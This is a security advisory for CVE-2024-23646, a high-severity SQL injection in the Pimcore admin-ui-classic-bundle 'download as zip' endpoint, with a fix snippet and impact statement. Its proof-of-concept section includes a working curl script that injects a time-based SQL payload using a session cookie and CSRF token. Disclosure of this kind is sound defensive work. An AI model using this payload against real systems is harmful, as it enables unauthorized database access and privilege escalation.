logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-23646 pimcore/admin-ui-classic-bundle

Package

Manager: composer
Name: pimcore/admin-ui-classic-bundle
Vulnerable Version: >=1.0.0 <1.3.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00135 pctl0.34025

Details

SQL Injection in Admin download files as zip ### Summary The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection. ### Details [downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escape parameters, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) not. The following code should be added: ``` foreach ($selectedIds as $selectedId) { if ($selectedId) { $quotedSelectedIds[] = $db->quote($selectedId); } } ``` ### PoC - Set up an example project as described on https://github.com/pimcore/demon (demo package with example content) - Log In. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie. - Run the following script, substituting the values accordingly: ``` #!/bin/bash BASE_URL=http://localhost # REPLACE THIS! CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS! COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS! SQL="(select*from(select(sleep(6)))a)" curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \ -X GET \ -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \ -H "Cookie: ${COOKIE}" ` ``` - The response is delayed by 6 seconds. ### Impact Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.

Metadata

Created: 2024-01-24T20:54:15Z
Modified: 2024-01-24T21:34:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-cwx6-4wmf-c6xv/GHSA-cwx6-4wmf-c6xv.json
CWE IDs: ["CWE-89"]
Alternative ID: GHSA-cwx6-4wmf-c6xv
Finding: F297
Auto approve: 1